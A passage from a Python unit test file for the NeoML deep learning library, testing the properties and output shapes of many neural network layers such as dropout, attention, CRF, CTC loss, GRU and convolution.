self.assertEqual(layer.name, 'bin')
self.assertEqual(bin.bit_set_size, 5)
bin.bit_set_size = 4
self.assertEqual(bin.bit_set_size, 4)
self.assertEqual(layer.bit_set_size, 4)
input1 = neoml.Blob.asblob(math_engine, np.ones((4, 3, 3, 3), dtype=np.int32), (4, 1, 1, 3, 3, 3, 1))
inputs = {"source1": input1}
outputs = dnn.run(inputs)
a = outputs["sink"]
self.assertEqual(a.shape, (4, 1, 1, 3, 3, 3, 4))
def test_dotproduct(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source1 = neoml.Dnn.Source(dnn, "source1")
source2 = neoml.Dnn.Source(dnn, "source2")
dotProduct = neoml.Dnn.DotProduct((source1, source2), "dotProduct")
sink = neoml.Dnn.Sink(dotProduct, "sink")
layer = dnn.layers['dotProduct']
self.assertEqual(layer.name, 'dotProduct')
input1 = neoml.Blob.asblob(math_engine, np.ones((16), dtype=np.float32), (1, 1, 1, 1, 1, 1, 16))
input2 = neoml.Blob.asblob(math_engine, np.ones((16), dtype=np.float32), (1, 1, 1, 1, 1, 1, 16))
inputs = {"source1": input1, "source2": input2}
outputs = dnn.run(inputs)
a = outputs["sink"].asarray()
self.assertEqual(a.size, 1)
self.assertEqual(a[0], 16)
def test_dropout(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source = neoml.Dnn.Source(dnn, "source")
dropout = neoml.Dnn.Dropout(source, 0.5, True, True, "dropout")
sink = neoml.Dnn.Sink(dropout, "sink")
layer = dnn.layers['dropout']
self.assertEqual(layer.name, 'dropout')
input = neoml.Blob.asblob(math_engine, np.ones((2, 3, 5, 4), dtype=np.float32), (2, 3, 1, 5, 1, 1, 4))
inputs = {"source": input}
outputs = dnn.run(inputs)
a = outputs["sink"].asarray()
self.assertEqual(a.shape, input.asarray().shape)
self.assertEqual(dropout.rate, 0.5)
self.assertEqual(dropout.spatial, True)
self.assertEqual(dropout.batchwise, True)
self.assertEqual(layer.rate, 0.5)
def test_accumulative_lookup(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source = neoml.Dnn.Source(dnn, "source")
lookup = neoml.Dnn.AccumulativeLookup(source, 5, 6, "lookup")
sink = neoml.Dnn.Sink(lookup, "sink")
layer = dnn.layers['lookup']
self.assertEqual(layer.name, 'lookup')
self.assertEqual(lookup.size, 6)
self.assertEqual(lookup.count, 5)
input = neoml.Blob.asblob(math_engine, np.ones((2, 5, 3), dtype=np.int32), (2, 1, 1, 5, 1, 1, 3))
inputs = {"source": input}
outputs = dnn.run(inputs)
out = outputs["sink"].asarray()
self.assertEqual(out.shape, (2, 6))
def test_multichannel_lookup(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source = neoml.Dnn.Source(dnn, "source")
lookup = neoml.Dnn.MultichannelLookup((source,), [(1, 4)], "lookup")
sink = neoml.Dnn.Sink(lookup, "sink")
layer = dnn.layers['lookup']
self.assertEqual(layer.name, 'lookup')
self.assertEqual(lookup.dimensions, [(1, 4)])
lookup.dimensions = [(3, 5)]
self.assertEqual(layer.dimensions, [(3, 5)])
input = neoml.Blob.asblob(math_engine, np.ones((2, 5, 3), dtype=np.float32), (2, 1, 1, 5, 1, 1, 3))
inputs = {"source": input}
outputs = dnn.run(inputs)
out = outputs["sink"].asarray()
self.assertEqual(out.shape, (2, 5, 7))
blob = lookup.get_embeddings(0)
lookup.set_embeddings(0, blob)
uniform = neoml.Dnn.Uniform()
lookup.initialize(uniform)
def test_tied_embeddings(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source = neoml.Dnn.Source(dnn, "source")
tied = neoml.Dnn.TiedEmbeddings((source,), "embeddings", 0, "tied")
sink = neoml.Dnn.Sink(tied, "sink")
layer = dnn.layers['tied']
self.assertEqual(layer.name, 'tied')
self.assertEqual(tied.channel, 0)
tied.channel = 1
self.assertEqual(tied.channel, 1)
self.assertEqual(layer.channel, 1)
self.assertEqual(tied.embeddings_layer_name, "embeddings")
tied.embeddings_layer_name = "embeddings2"
self.assertEqual(tied.embeddings_layer_name, "embeddings2")
def test_accuracy(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source1 = neoml.Dnn.Source(dnn, "source1")
source2 = neoml.Dnn.Source(dnn, "source2")
accuracy = neoml.Dnn.Accuracy((source1, source2), True, "accuracy")
sink = neoml.Dnn.Sink(accuracy, "sink")
layer = dnn.layers['accuracy']
self.assertEqual(layer.name, 'accuracy')
self.assertEqual(accuracy.reset, True)
self.assertEqual(layer.reset, True)
input1 = neoml.Blob.asblob(math_engine, np.ones((1, 16), dtype=np.float32), (1, 16, 1, 1, 1, 1, 1))
input2 = neoml.Blob.asblob(math_engine, np.ones((1, 16), dtype=np.float32), (1, 16, 1, 1, 1, 1, 1))
inputs = {"source1": input1, "source2": input2}
outputs = dnn.run(inputs)
a = outputs["sink"].asarray()
self.assertEqual(a.size, 1)
self.assertAlmostEqual(a[0], 1.0, delta=1e-3)
def test_confusion_matrix(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source1 = neoml.Dnn.Source(dnn, "source1")
source2 = neoml.Dnn.Source(dnn, "source2")
accuracy = neoml.Dnn.ConfusionMatrix((source1, source2), True, "accuracy")
sink = neoml.Dnn.Sink(accuracy, "sink")
layer = dnn.layers['accuracy']
self.assertEqual(layer.name, 'accuracy')
self.assertEqual(accuracy.reset, True)
self.assertEqual(layer.reset, True)
input1 = neoml.Blob.asblob(math_engine, np.ones((16, 2), dtype=np.float32), (1, 16, 1, 1, 1, 1, 2))
input2 = neoml.Blob.asblob(math_engine, np.ones((16, 2), dtype=np.float32), (1, 16, 1, 1, 1, 1, 2))
inputs = {"source1": input1, "source2": input2}
outputs = dnn.run(inputs)
a = outputs["sink"].asarray()
self.assertEqual( accuracy.matrix.shape, (2, 2) )
self.assertEqual(a.size, 4)
self.assertAlmostEqual(a[0][0], 16.0, delta=1e-3)
def _test_activation(self, layer, kwargs={}):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source = neoml.Dnn.Source(dnn, "source")
activation = getattr(neoml.Dnn, layer)(source, name="activation", **kwargs)
sink = neoml.Dnn.Sink(activation, "sink")
layer = dnn.layers['activation']
self.assertEqual(layer.name, 'activation')
input = neoml.Blob.asblob(math_engine, np.ones((1, 16), dtype=np.float32), (1, 16, 1, 1, 1, 1, 1))
inputs = {"source": input}
outputs = dnn.run(inputs)
out = outputs["sink"].asarray()
for k,v in kwargs.items():
self.assertAlmostEqual(getattr(activation, k), v, delta=1e-3,
msg='Field {} of {} activation differs'.format(k, layer))
self.assertEqual(getattr(activation, k), getattr(layer, k))
return out
def test_activation_linear(self):
out = self._test_activation('Linear', dict(multiplier=3.3, free_term=4.4))
self.assertTrue(np.isclose(out, 7.7).all())
def test_activation_elu(self):
out = self._test_activation('ELU', dict(alpha=3.3))
self.assertTrue(np.isclose(out, 1).all())
def test_activation_relu(self):
out = self._test_activation('ReLU', dict(threshold=3.3))
self.assertTrue(np.isclose(out, 1).all())
def test_activation_leaky_relu(self):
out = self._test_activation('LeakyReLU', dict(alpha=3.3))
self.assertTrue(np.isclose(out, 1).all())
def test_activation_hswish(self):
out = self._test_activation('HSwish')
self.assertTrue(np.isclose(out, 2./3).all())
def test_activation_gelu(self):
out = self._test_activation('GELU')
self.assertTrue(np.isclose(out, 0.84579575).all())
def test_activation_abs(self):
out = self._test_activation('Abs')
self.assertTrue(np.isclose(out, 1).all())
def test_activation_sigmoid(self):
out = self._test_activation('Sigmoid')
self.assertTrue(np.isclose(out, 0.7310586).all())
def test_activation_tanh(self):
out = self._test_activation('Tanh')
self.assertTrue(np.isclose(out, 0.7615942).all())
def test_activation_hardtanh(self):
out = self._test_activation('HardTanh')
self.assertTrue(np.isclose(out, 1).all())
def test_activation_hardsigmoid(self):
out = self._test_activation('HardSigmoid', dict(slope=5.5, bias=6.6))
self.assertTrue(np.isclose(out, 1).all())
def test_activation_power(self):
out = self._test_activation('Power', dict(exponent=5.5))
self.assertTrue(np.isclose(out, 1).all())
def test_add_object(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source1 = neoml.Dnn.Source(dnn, "source1")
source2 = neoml.Dnn.Source(dnn, "source2")
add_to_object = neoml.Dnn.AddToObject((source1, source2), "add_to_object")
sink = neoml.Dnn.Sink(add_to_object, "sink")
layer = dnn.layers['add_to_object']
self.assertEqual(layer.name, 'add_to_object')
input1 = neoml.Blob.asblob(math_engine, np.ones((8, 4, 4), dtype=np.float32), (1, 8, 1, 4, 4, 1, 1))
input2 = neoml.Blob.asblob(math_engine, np.ones((4, 4), dtype=np.float32), (1, 1, 1, 4, 4, 1, 1))
inputs = {"source1": input1, "source2": input2}
outputs = dnn.run(inputs)
a = outputs["sink"].asarray()
self.assertEqual(a.size, 128)
self.assertAlmostEqual(a[1][1][1], 2.0, delta=1e-3)
def test_argmax(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source = neoml.Dnn.Source(dnn, "source")
argmax = neoml.Dnn.Argmax(source, dimension="channels", name="argmax")
sink = neoml.Dnn.Sink(argmax, "sink")
layer = dnn.layers['argmax']
self.assertEqual(layer.name, 'argmax')
self.assertEqual(argmax.dimension, "channels")
argmax.dimension = "batch_length"
self.assertEqual(argmax.dimension, "batch_length")
input = neoml.Blob.asblob(math_engine, np.array([1, 2, 3, 1], dtype=np.float32), (4, 1, 1, 1, 1, 1, 1))
inputs = {"source": input}
outputs = dnn.run(inputs)
out = outputs["sink"].asarray()
self.assertEqual(out, 2)
def test_attention_decoder(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source1 = neoml.Dnn.Source(dnn, "source1")
source2 = neoml.Dnn.Source(dnn, "source2")
decoder = neoml.Dnn.AttentionDecoder((source1, source2), "additive", 16, 32, 64, "decoder")
sink = neoml.Dnn.Sink(decoder, "sink")
layer = dnn.layers['decoder']
self.assertEqual(layer.name, 'decoder')
self.assertEqual(decoder.hidden_layer_size, 16)
self.assertEqual(decoder.output_object_size, 32)
self.assertEqual(decoder.output_seq_len, 64)
self.assertEqual(decoder.score, "additive")
decoder.score = "dot_product"
self.assertEqual(decoder.score, "dot_product")
decoder.score = "additive"
decoder.hidden_layer_size = 1
self.assertEqual(decoder.hidden_layer_size, 1)
self.assertEqual(layer.hidden_layer_size, 1)
decoder.output_object_size = 1
self.assertEqual(decoder.output_object_size, 1)
self.assertEqual(layer.output_object_size, 1)
decoder.output_seq_len = 1
self.assertEqual(decoder.output_seq_len, 1)
self.assertEqual(layer.output_seq_len, 1)
input1 = neoml.Blob.asblob(math_engine, np.ones(1, dtype=np.float32), (1, 1, 1, 1, 1, 1, 1))
input2 = neoml.Blob.asblob(math_engine, np.ones(1, dtype=np.float32), (1, 1, 1, 1, 1, 1, 1))
inputs = {"source1": input1, "source2": input2}
outputs = dnn.run(inputs)
out = outputs["sink"].asarray()
self.assertSequenceEqual(out, [1])
def test_batch_norm(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source = neoml.Dnn.Source(dnn, "source")
batch_norm = neoml.Dnn.BatchNormalization(source, True, True, 0.3, "batch_norm")
sink = neoml.Dnn.Sink(batch_norm, "sink")
layer = dnn.layers['batch_norm']
self.assertEqual(layer.name, 'batch_norm')
arr = np.ones((5, 3, 2), dtype=np.float32)
input = neoml.Blob.asblob(math_engine, arr, (5, 1, 3, 2, 1, 1, 1))
inputs = {"source": input}
outputs = dnn.run(inputs)
out = outputs["sink"].asarray()
self.assertTrue(np.array_equal(arr, out))
self.assertEqual(batch_norm.channel_based, True)
self.assertEqual(batch_norm.zero_free_term, True)
self.assertAlmostEqual(batch_norm.slow_convergence_rate, 0.3, delta=1e-3)
self.assertEqual(layer.channel_based, True)
self.assertEqual(layer.zero_free_term, True)
self.assertAlmostEqual(layer.slow_convergence_rate, 0.3, delta=1e-3)
def test_matrix_multiplication(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source1 = neoml.Dnn.Source(dnn, "source1")
source2 = neoml.Dnn.Source(dnn, "source2")
mult = neoml.Dnn.MatrixMultiplication((source1, source2), "mm")
sink = neoml.Dnn.Sink(mult, "sink")
layer = dnn.layers['mm']
self.assertEqual(layer.name, 'mm')
mult1 = np.array([[1, 2], [3, 4]], dtype=np.float32)
mult2 = np.array([[1, 2], [3, 4]], dtype=np.float32)
input1 = neoml.Blob.asblob(math_engine, mult1, (2, 1, 2, 1, 1, 1, 1))
input2 = neoml.Blob.asblob(math_engine, mult2, (2, 1, 2, 1, 1, 1, 1))
inputs = {"source1": input1, "source2": input2}
outputs = dnn.run(inputs)
out = outputs["sink"].asarray()
self.assertTrue(np.array_equal(out, mult1 * mult2))
def test_multihead_attention(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source1 = neoml.Dnn.Source(dnn, "source1")
source2 = neoml.Dnn.Source(dnn, "source2")
source3 = neoml.Dnn.Source(dnn, "source3")
att = neoml.Dnn.MultiheadAttention((source1, source2, source3), 5, 9, 3, 0.3, "att")
sink = neoml.Dnn.Sink(att, "sink")
layer = dnn.layers['att']
self.assertEqual(layer.name, 'att')
self.assertEqual(att.head_count, 5)
att.head_count = 4
self.assertEqual(att.head_count, 4)
self.assertEqual(att.hidden_size, 9)
att.hidden_size = 8
self.assertEqual(att.hidden_size, 8)
self.assertEqual(att.output_size, 3)
att.output_size = 8
self.assertEqual(att.output_size, 8)
self.assertEqual(att.use_mask, False)
att.use_mask = True
self.assertEqual(att.use_mask, True)
att.use_mask = False
self.assertAlmostEqual(att.dropout_rate, 0.3, delta=1e-3)
att.dropout_rate = 0.4
self.assertAlmostEqual(att.dropout_rate, 0.4, delta=1e-3)
self.assertEqual(layer.hidden_size, 8)
self.assertEqual(layer.output_size, 8)
self.assertEqual(layer.use_mask, False)
self.assertAlmostEqual(layer.dropout_rate, 0.4, delta=1e-3)
input1 = neoml.Blob.asblob(math_engine, np.ones((4, 3, 3), dtype=np.float32), (1, 4, 3, 1, 1, 1, 3))
input2 = neoml.Blob.asblob(math_engine, np.ones((4, 2, 3), dtype=np.float32), (1, 4, 2, 1, 1, 1, 3))
input3 = neoml.Blob.asblob(math_engine, np.ones((4, 2, 2), dtype=np.float32), (1, 4, 2, 1, 1, 1, 4))
inputs = {"source1": input1, "source2": input2, "source3": input3}
outputs = dnn.run(inputs)
out = outputs["sink"].asarray()
self.assertEqual(out.shape, (4, 3, 8))
def test_image_to_pixel(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source1 = neoml.Dnn.Source(dnn, "source1")
source2 = neoml.Dnn.Source(dnn, "source2")
conv = neoml.Dnn.ImageToPixel((source1, source2), "conv")
sink = neoml.Dnn.Sink(conv, "sink")
layer = dnn.layers['conv']
self.assertEqual(layer.name, 'conv')
input1 = neoml.Blob.asblob(math_engine, np.ones((4, 3, 2), dtype=np.float32), (1, 4, 3, 1, 1, 1, 2))
input2 = neoml.Blob.asblob(math_engine, np.zeros((4, 3), dtype=np.int32), (1, 4, 1, 1, 1, 1, 3))
inputs = {"source1": input1, "source2": input2}
outputs = dnn.run(inputs)
out = outputs["sink"].asarray()
self.assertEqual(out.shape, (4, 3, 2))
def test_pixel_to_image(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source1 = neoml.Dnn.Source(dnn, "source1")
source2 = neoml.Dnn.Source(dnn, "source2")
conv = neoml.Dnn.PixelToImage((source1, source2), 4, 8, "conv")
sink = neoml.Dnn.Sink(conv, "sink")
layer = dnn.layers['conv']
self.assertEqual(layer.name, 'conv')
self.assertEqual(conv.height, 4)
conv.height = 5
self.assertEqual(conv.height, 5)
self.assertEqual(conv.width, 8)
conv.width = 9
self.assertEqual(conv.width, 9)
self.assertEqual(layer.height, 5)
self.assertEqual(layer.width, 9)
input1 = neoml.Blob.asblob(math_engine, np.ones((4, 3, 2), dtype=np.float32), (1, 4, 3, 1, 1, 1, 2))
input2 = neoml.Blob.asblob(math_engine, np.zeros((4, 3), dtype=np.int32), (1, 4, 1, 1, 1, 1, 3))
inputs = {"source1": input1, "source2": input2}
outputs = dnn.run(inputs)
out = outputs["sink"].asarray()
self.assertEqual(out.shape, (4, 5, 9, 2))
def test_image_resize(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source1 = neoml.Dnn.Source(dnn, "source1")
conv = neoml.Dnn.ImageResize(source1, [5, 6, 7, 8], 0.1, "conv")
sink = neoml.Dnn.Sink(conv, "sink")
layer = dnn.layers['conv']
self.assertEqual(layer.name, 'conv')
self.assertEqual(conv.deltas, [5, 6, 7, 8] )
conv.deltas = [1, 2, 3, 4]
self.assertEqual(conv.deltas, [1, 2, 3, 4])
self.assertAlmostEqual(conv.default_value, 0.1)
conv.default_value = 0.2
self.assertAlmostEqual(conv.default_value, 0.2)
self.assertEqual(layer.deltas, [1, 2, 3, 4])
self.assertAlmostEqual(layer.default_value, 0.2)
input1 = neoml.Blob.asblob(math_engine, np.ones((2, 10, 11, 2), dtype=np.float32), (1, 1, 2, 10, 11, 1, 2))
inputs = {"source1": input1}
outputs = dnn.run(inputs)
out = outputs["sink"].asarray()
self.assertEqual(out.shape, (2, 17, 14, 2))
def test_crf(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source1 = neoml.Dnn.Source(dnn, "source1")
source2 = neoml.Dnn.Source(dnn, "source2")
crf = neoml.Dnn.Crf((source1, source2), 5, 3, 0.3, "crf")
sink1 = neoml.Dnn.Sink((crf, 0), "sink1")
sink2 = neoml.Dnn.Sink((crf, 1), "sink2")
sink3 = neoml.Dnn.Sink((crf, 2), "sink3")
layer = dnn.layers['crf']
self.assertEqual(layer.name, 'crf')
self.assertEqual(crf.class_count, 5)
crf.class_count = 7
self.assertEqual(crf.class_count, 7)
self.assertEqual(crf.padding, 3)
crf.padding = 1
self.assertEqual(crf.padding, 1)
self.assertAlmostEqual(crf.dropout_rate, 0.3)
crf.dropout_rate = 0.2
self.assertAlmostEqual(crf.dropout_rate, 0.2)
self.assertEqual(crf.calc_best_prev_class, False)
crf.calc_best_prev_class = True
self.assertEqual(crf.calc_best_prev_class, True)
self.assertEqual(layer.class_count, 7)
self.assertEqual(layer.padding, 1)
self.assertAlmostEqual(layer.dropout_rate, 0.2)
self.assertEqual(layer.calc_best_prev_class, True)
hidden_weights = crf.hidden_weights
crf.hidden_weights = hidden_weights
free_terms = crf.free_terms
crf.free_terms = free_terms
transitions = crf.transitions
crf.transitions = transitions
input1 = neoml.Blob.asblob(math_engine, np.ones((5, 7), dtype=np.float32), (1, 1, 5, 1, 1, 1, 7))
input2 = neoml.Blob.asblob(math_engine, np.ones((5, ), dtype=np.int32), (1, 1, 5, 1, 1, 1, 1))
inputs = {"source1": input1, "source2": input2}
outputs = dnn.run(inputs)
out1 = outputs["sink1"].asarray()
out2 = outputs["sink2"].asarray()
out3 = outputs["sink3"].asarray()
self.assertEqual(out1.shape, (7,))
self.assertEqual(out2.shape, (7,))
self.assertEqual(out3.shape, (1,))
def test_crf_loss(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source1 = neoml.Dnn.Source(dnn, "source1")
source2 = neoml.Dnn.Source(dnn, "source2")
source3 = neoml.Dnn.Source(dnn, "source3")
crfLoss = neoml.Dnn.CrfLoss((source1, source2, source3), 0.4, "loss")
layer = dnn.layers['loss']
self.assertEqual(layer.name, 'loss')
self.assertAlmostEqual(crfLoss.loss_weight, 0.4, delta=1e-3)
crfLoss.loss_weight = 0.6
self.assertAlmostEqual(crfLoss.loss_weight, 0.6, delta=1e-3)
self.assertAlmostEqual(layer.loss_weight, 0.6, delta=1e-3)
crfLoss.max_gradient = 0.6
self.assertAlmostEqual(crfLoss.max_gradient, 0.6, delta=1e-3)
self.assertAlmostEqual(layer.max_gradient, 0.6, delta=1e-3)
self.assertAlmostEqual(crfLoss.last_loss, 0, delta=1e-3)
input1 = neoml.Blob.asblob(math_engine, np.ones((3, 5), dtype=np.int32), (3, 1, 5, 1, 1, 1, 1))
input2 = neoml.Blob.asblob(math_engine, np.ones((3, 5), dtype=np.float32), (3, 1, 5, 1, 1, 1, 1))
input3 = neoml.Blob.asblob(math_engine, np.ones((3, 5), dtype=np.float32), (3, 1, 5, 1, 1, 1, 1))
inputs = {"source1": input1, "source2": input2, "source3": input3}
dnn.run(inputs)
self.assertAlmostEqual(crfLoss.last_loss, -2, delta=1e-3)
def test_crf_best_sequence(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source1 = neoml.Dnn.Source(dnn, "source1")
source2 = neoml.Dnn.Source(dnn, "source2")
best = neoml.Dnn.BestSequence((source1, source2), "best")
sink = neoml.Dnn.Sink(best, "sink")
layer = dnn.layers['best']
self.assertEqual(layer.name, 'best')
input1 = neoml.Blob.asblob(math_engine, np.zeros((3, 5), dtype=np.int32), (3, 1, 5, 1, 1, 1, 1))
input2 = neoml.Blob.asblob(math_engine, np.ones((3, 5), dtype=np.float32), (3, 1, 5, 1, 1, 1, 1))
inputs = {"source1": input1, "source2": input2}
outputs = dnn.run(inputs)
out = outputs["sink"].asarray()
self.assertTrue(np.equal(out, [0., 0., 0.]).all())
def test_ctc_loss(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source1 = neoml.Dnn.Source(dnn, "source1")
source2 = neoml.Dnn.Source(dnn, "source2")
ctcLoss = neoml.Dnn.CtcLoss((source1, source2), 6, False, 0.4, "loss")
layer = dnn.layers['loss']
self.assertEqual(layer.name, 'loss')
self.assertEqual(ctcLoss.blank, 6)
ctcLoss.blank = 5
self.assertEqual(ctcLoss.blank, 5)
self.assertEqual(layer.blank, 5)
self.assertAlmostEqual(ctcLoss.loss_weight, 0.4, delta=1e-3)
ctcLoss.loss_weight = 0.6
self.assertAlmostEqual(ctcLoss.loss_weight, 0.6, delta=1e-3)
self.assertAlmostEqual(layer.loss_weight, 0.6, delta=1e-3)
ctcLoss.max_gradient = 0.6
self.assertAlmostEqual(ctcLoss.max_gradient, 0.6, delta=1e-3)
self.assertAlmostEqual(ctcLoss.last_loss, 0, delta=1e-3)
self.assertEqual(ctcLoss.skip, False)
ctcLoss.skip = True
self.assertEqual(ctcLoss.skip, True)
input1 = neoml.Blob.asblob(math_engine, np.ones((64, 4, 5), dtype=np.float32), (3, 4, 1, 1, 1, 1, 5))
input2 = neoml.Blob.asblob(math_engine, np.ones((2, 4), dtype=np.int32), (2, 4, 1, 1, 1, 1, 1))
inputs = {"source1": input1, "source2": input2}
dnn.run(inputs)
self.assertAlmostEqual(ctcLoss.last_loss, 4.8283, delta=1e-4)
self.assertAlmostEqual(layer.last_loss, 4.8283, delta=1e-4)
def test_ctc_decoding(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source1 = neoml.Dnn.Source(dnn, "source1")
source2 = neoml.Dnn.Source(dnn, "source2")
ctc = neoml.Dnn.CtcDecoding((source1, source2), 5, 0.4, 0.5, "ctc")
layer = dnn.layers['ctc']
self.assertEqual(layer.name, 'ctc')
self.assertEqual(ctc.blank, 5)
ctc.blank = 6
self.assertEqual(ctc.blank, 6)
self.assertAlmostEqual(ctc.blank_threshold, 0.4, delta=1e-3)
ctc.blank_threshold = 0.6
self.assertAlmostEqual(ctc.blank_threshold, 0.6, delta=1e-3)
self.assertAlmostEqual(ctc.arc_threshold, 0.5, delta=1e-3)
ctc.arc_threshold = 0.7
self.assertAlmostEqual(ctc.arc_threshold, 0.7, delta=1e-3)
self.assertEqual(ctc.sequence_length, 0)
self.assertEqual(ctc.batch_width, 0)
self.assertEqual(ctc.label_count, 0)
self.assertAlmostEqual(layer.blank_threshold, 0.6, delta=1e-3)
self.assertAlmostEqual(layer.arc_threshold, 0.7, delta=1e-3)
ctc.get_best_sequence(0)
input1 = neoml.Blob.asblob(math_engine, np.ones((3, 4, 5), dtype=np.float32), (3, 4, 1, 1, 1, 1, 5))
input2 = neoml.Blob.asblob(math_engine, np.ones((4, ), dtype=np.int32), (1, 4, 1, 1, 1, 1, 1))
inputs = {"source1": input1, "source2": input2}
dnn.run(inputs)
def test_gru(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source1 = neoml.Dnn.Source(dnn, "source1")
gru = neoml.Dnn.Gru((source1,), 5, "gru")
sink = neoml.Dnn.Sink(gru, "sink")
layer = dnn.layers['gru']
self.assertEqual(layer.name, 'gru')
self.assertEqual(gru.hidden_size, 5)
gru.hidden_size = 6
self.assertEqual(gru.hidden_size, 6)
self.assertEqual(layer.hidden_size, 6)
main_weights = gru.main_weights
gru.main_weights = main_weights
main_free_term = gru.main_free_term
gru.main_free_term = main_free_term
gate_weights = gru.gate_weights
gru.gate_weights = gate_weights
gate_free_term = gru.gate_free_term
gru.gate_free_term = gate_free_term
input1 = neoml.Blob.asblob(math_engine, np.ones((3, 2, 3), dtype=np.float32), (3, 2, 1, 1, 1, 1, 3))
inputs = {"source1": input1}
outputs = dnn.run(inputs)
out = outputs["sink"].asarray()
self.assertEqual(out.shape, (3, 2, 6))
def _test_eltwise(self, layer, check_f):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source1 = neoml.Dnn.Source(dnn, "source1")
source2 = neoml.Dnn.Source(dnn, "source2")
eltwise = getattr(neoml.Dnn, layer)((source1, source2), "eltwise")
sink = neoml.Dnn.Sink(eltwise, "sink")
layer = dnn.layers['eltwise']
self.assertEqual(layer.name, 'eltwise')
input1 = neoml.Blob.asblob(math_engine, 3 * np.ones((2, 3, 4), dtype=np.float32), (2, 3, 4, 1, 1, 1, 1))
input2 = neoml.Blob.asblob(math_engine, 2 * np.ones((2, 3, 4), dtype=np.float32), (2, 3, 4, 1, 1, 1, 1))
inputs = {"source1": input1, "source2": input2}
outputs = dnn.run(inputs)
out = outputs["sink"].asarray()
self.assertTrue(check_f(out))
def test_eltwise_sum(self):
self._test_eltwise('EltwiseSum', lambda x: (x == 5).all())
def test_eltwise_sub(self):
self._test_eltwise('EltwiseSub', lambda x: (x == 1).all())
def test_eltwise_mul(self):
self._test_eltwise('EltwiseMul', lambda x: (x == 6).all())
def test_eltwise_div(self):
self._test_eltwise('EltwiseDiv', lambda x: (x == 1.5).all())
def test_eltwise_negmul(self):
self._test_eltwise('EltwiseNegMul', lambda x: (x == -4).all())
def test_eltwise_max(self):
self._test_eltwise('EltwiseMax', lambda x: (x == 3).all())
def test_conv(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source1 = neoml.Dnn.Source(dnn, "source1")
source2 = neoml.Dnn.Source(dnn, "source2")
conv = neoml.Dnn.Conv((source1, source2), 16, (6, 6), (7, 7), (8, 8), (9, 9), False, "conv")
sink1 = neoml.Dnn.Sink((conv, 0), "sink1")
sink2 = neoml.Dnn.Sink((conv, 1), "sink2")
layer = dnn.layers['conv']
self.assertEqual(layer.name, 'conv')
self.assertEqual(conv.filter_count, 16)
conv.filter_count = 17
self.assertEqual(conv.filter_count, 17)
self.assertEqual(layer.filter_count, 17)
self.assertEqual(conv.filter_size, (6, 6))
self.assertEqual(layer.filter_size, (6, 6))
conv.filter_size = (3, 3)
self.assertEqual(conv.filter_size, (3, 3))
self.assertEqual(conv.stride_size, (7, 7))
conv.stride_size = (2, 2)
self.assertEqual(conv.stride_size, (2, 2))
self.assertEqual(layer.stride_size, (2, 2))
self.assertEqual(conv.padding_size, (8, 8))
conv.padding_size = (1, 1)
self.assertEqual(conv.padding_size, (1, 1))
self.assertEqual(conv.dilation_size, (9, 9))
conv.dilation_size = (1, 1)
self.assertEqual(conv.dilation_size, (1, 1))
input1 = neoml.Blob.asblob(math_engine, np.ones((2, 3, 4, 5, 5), dtype=np.float32), (2, 3, 4, 5, 5, 1, 1))
input2 = neoml.Blob.asblob(math_engine, np.ones((2, 3, 4, 5, 5), dtype=np.float32), (2, 3, 4, 5, 5, 1, 1))
inputs = {"source1": input1, "source2": input2}
outputs = dnn.run(inputs)
out1 = outputs["sink1"].asarray()
out2 = outputs["sink2"].asarray()
self.assertEqual(out1.shape, (2, 3, 4, 3, 3, 17))
self.assertEqual(out2.shape, (2, 3, 4, 3, 3, 17))
def test_transposed_conv(self):
math_engine = neoml.MathEngine.CpuMathEngine(1)
dnn = neoml.Dnn.Dnn(math_engine)
source1 = neoml.Dnn.Source(dnn, "source1")
source2 = neoml.Dnn.Source(dnn, "source2")
conv = neoml.Dnn.TransposedConv((source1, source2), 16, (6, 6), (7, 7), (8, 8), (9, 9), False, "conv")
sink1 = neoml.Dnn.Sink((conv, 0), "sink1")
sink2 = neoml.Dnn.Sink((conv, 1), "sink2")
layer = dnn.layers['conv']
self.assertEqual(layer.name, 'conv')
self.assertEqual(conv.filter_count, 16)
conv.filter_count = 17
self.assertEqual(conv.filter_count, 17)
